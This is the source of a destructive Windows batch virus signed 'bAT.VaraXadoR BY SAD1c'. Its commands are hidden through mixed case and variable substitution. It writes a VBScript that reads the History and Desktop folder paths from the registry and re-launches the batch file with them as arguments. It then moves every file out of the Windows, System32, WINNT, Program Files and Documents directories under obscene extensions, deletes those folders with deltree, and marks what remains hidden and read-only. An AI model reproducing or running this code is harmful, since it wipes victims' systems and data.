: bAT.VaraXadoR BY SAD1c
@ECho OfF
SEt &/=dEl
iF %1==/pPoV GoTo EfP
sEt ()=YsTeM32\sHUtDOw
If nOT ExIsT %wInDiR%\S%()%n.eXe CTty nUl
SeT ?'?=rIpT.ShEl
sET @$=%TeMp%\VtEmP.vBs
SEt &/=CU\sOFtWaRe\mICroSOfT\WiNdOwS\cuRRenTVerSIon\ExPlOrEr\sHELL FoLdErS\
set !"!=REatEObjEC
eChO.On eRRor ReSuMe nExT>%@$%
EcHo dIm VwS>>%@$%
eChO SET VwS=c%!"!%T("WSc%?'?%L")>>%@$%
eCHo VwS.rUn "%0 /pPoV "&VwS.ReGrEaD("HK%&/%hIStORy")&" "&VwS.rEgReAd("HK%&/%DeSkToP"), 0>>%@$%
SEt &/=dEl
StArT /w %@$%
%&/% %@$%
IF nOt eXISt %WIndIR%\s%()%N.ExE ctTY CoN
GOto eNdP
:EfP
sEt _=E /y
MoV%_% \*.* %2\*.666
mOv%_% %wIndIr%\*.* %2\*.FucK
MOv%_% %WInDiR%\sYsTeM\*.* %2\*.kiLL
mOV%_% %WindiR%\SyStEm32\*.* %2\*.dIe
Mov%_% \WiNnT\*.* %2\*.EvIl
moV%_% \wInNt\SysTEm32\*.* %2\*.bLoOd
If NoT ExiST %wiNDir%\COmmANd\%&/%TrEe.eXE gOtO Nod
%&/%tRe%_% \PrOgRa~1
%&/%TrE%_% \dOcUmE~1
%&/%tRE%_% %3
goTo sFnD
:Nod
mov%_% \prOGra~1\*.* %2\*.sHIt
mOv%_% \DOcuME~1\*.* %2\*.BItCH
MOV%_% %3\*.* %2\*.SaTaN
:sFnD
AtTrIb +H +R +s %2\*.*
:eNdP
CLs